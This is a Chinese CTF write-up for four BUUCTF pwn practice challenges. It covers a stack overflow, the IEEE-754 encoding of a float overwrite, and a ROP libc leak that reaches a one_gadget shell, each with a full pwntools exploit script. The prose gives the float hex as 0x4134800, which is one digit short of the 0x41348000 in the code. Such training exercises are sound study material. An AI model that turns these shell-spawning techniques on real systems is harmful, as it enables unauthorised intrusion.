&pwn1_sctf_2016 &ciscn_2019_n_1 &ciscn_2019_c_1 &ciscn_2019_en_2&
在做buu题目的时候,发现在最上面有几道被各位师傅打到1分的题,强迫症逼迫我去做那几道题。
这里来试着去解决这些题。。。讲真的,我感觉自己刷题真的少,即使是很简单的栈题目,我还是能学习到新的东西。这里就记录一下这几道题。
pwn1_sctf_2016
检查了一下保护,32位程序,只开启了堆栈不可执行。直接ida看一下伪代码吧。
看代码也就是一个简单的栈溢出。但是我并没有自己做出这道题,太菜了。。。大一下学期我们有开设C++这门课,但是我由于一些事情,在家休息了一个多月,结果课也落下了。。。太痛苦了,C++吃亏在这里了,总要补的。。。
其实这个CTF就应该半分做,半分蒙。可以看到fgets是对我们输入的内容进行了限制,所以我们不能溢出到返回地址,但是可以看到两个字符串“I”和“you”,其实应该输入这几个字符串进去看看是什么意思的。
这里其实是一个回显,但是你如果输入“I”的话,就会给你自动转换成you,所以就解决溢出不到返回地址的问题了。接下来就是计算了。题目本身有可以直接拿shell的函数,直接返回地址转到那个shell 的地址就行了。还是羞耻的贴一下exp:
1 from pwn import * 2 3 p = process('./1') 4 context.log_level = 'debug' 5 6 shell_addr = 0x08048F0D 7 8 payload = 'I'*21 + 'b' + p32(shell_addr) 9 p.sendline(payload) 10 p.recv() 11 p.recv()
ciscn_2019_n_1
64位程序,保护只开启了堆栈不可执行。
老套路,IDA看一下伪代码。
可以看到这里gets是可以进行溢出的,但是这道题我们没有必要进行溢出,只要覆盖到v2,让v2==11.28125就可以了。
接下来就是要明白浮点数如何在内存中表示了。
所以11.28125用二进制表示的话,就是1011.01001,但是计算机可不会知道哪里有小数点,计算机只会识别01,至于这些01表示什么,那是由人定义的。就像这里,人们把这个定义为浮点数,当呈现在我们面前的时候,就是按照浮点数给我解释的。
一个浮点数占有四个字节,一个字节由两个四位二进制数表示,那么大概就是这么个意思。
xxxxxxxx xxxxxxxxx xxxxxxxx xxxxxxxx
每个x都是占一个位,而对于浮点是计算机是怎么进行解释的呢?
如你所见,32位每一位都有意义。
符号位(Sign) : 0代表正,1代表为负
指数位(Exponent):用于存储科学计数法中的指数数据,并且采用移位存储。
尾数部分(Mantissa):尾数部分
还是拉回来,看1011.01001 = 1011.01001*2的0次方 == 1.01101001*2的3次方
因为是正数,所以符号位为0
指数为127+1==128,127是一个偏移,这个偏移是由于说这个指数可能是负数,用这个指数位的时候需要先减去127再用,所以这里是127。(你或许没有听懂...大概意思有个组织这么规定了指数的正负)3就就是上面2的次方。
再看尾数部分,尾数部分是01101001,接下来我们试着来写一下这个二进制数
0 1000 0010 0110 1001 0000 0000 0000 000
所以连起来就是01000001001101001000000000000000
转换成16进制就是0x4134800,所以我们把V2的位置覆盖成这个数字就行了。
贴一下exp:
1 from pwn import * 2 3 p = process('./ciscn_2019_n_1') 4 elf = ELF('./ciscn_2019_n_1') 5 context.log_level = 'debug' 6 7 payload = 'a'*(0x30-4) + p64(0x41348000) 8 p.sendlineafter('number.\n',payload) 9 p.recv()
ciscn_2019_c_1 / ciscn_2019_en_1
感觉两道题长得一模一样。。。用一个exp都打通了。
检查保护,64位程序,只开启了堆栈不可执行。
emmmmmmm,简单的rop,溢出leaklibc然后拿到shell。
用system拿不到shell,用one_getgad可以。
直接贴exp了:
1 from pwn import * 2 3 #p = process('./ciscn_2019_c_1') 4 p = remote('node3.buuoj.cn',27137) 5 elf = ELF('./ciscn_2019_c_1') 6 context.log_level = 'debug' 7 8 pop_rdi = 0x00400c83 9 sh = 0x0040045c 10 puts_plt = 0x004006E0 11 puts_got = elf.got['puts'] 12 start = elf.symbols['_start'] 13 #start = 0x0004009A0 //encry fun 14 15 p.sendlineafter('choice!\n','1') 16 payload = 'a'*0x50 + 'bbbbbbbb' 17 payload += p64(pop_rdi) + p64(puts_got) 18 payload += p64(puts_plt) + p64(start) 19 p.sendlineafter('encrypted\n',payload) 20 sleep(0.1) 21 p.recv(0x67) 22 puts_addr = u64(p.recv(6).ljust(8,'\x00')) 23 print hex(puts_addr) 24 base_addr = puts_addr - 0x0809c0 25 system_addr = base_addr + 0x04f440 26 binsh_addr = base_addr + 0x1b3e9a 27 shell_addr = base_addr + 0x4f322 28 29 sleep(0.1) 30 p.sendlineafter('choice!\n','1') 31 payload = 'a'*0x50 + 'bbbbbbbb' 32 payload += p64(shell_addr) 33 p.sendlineafter('encrypted\n',payload) 34 sleep(0.1) 35 p.recv() 36 p.interactive() 37 38 ''' 39 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) 40 constraints: 41 rsp & 0xf == 0 42 rcx == NULL 43 44 0x4f322 execve("/bin/sh", rsp+0x40, environ) 45 constraints: 46 [rsp+0x40] == NULL 47 48 0x10a38c execve("/bin/sh", rsp+0x70, environ) 49 constraints: 50 [rsp+0x70] == NULL 51 '''
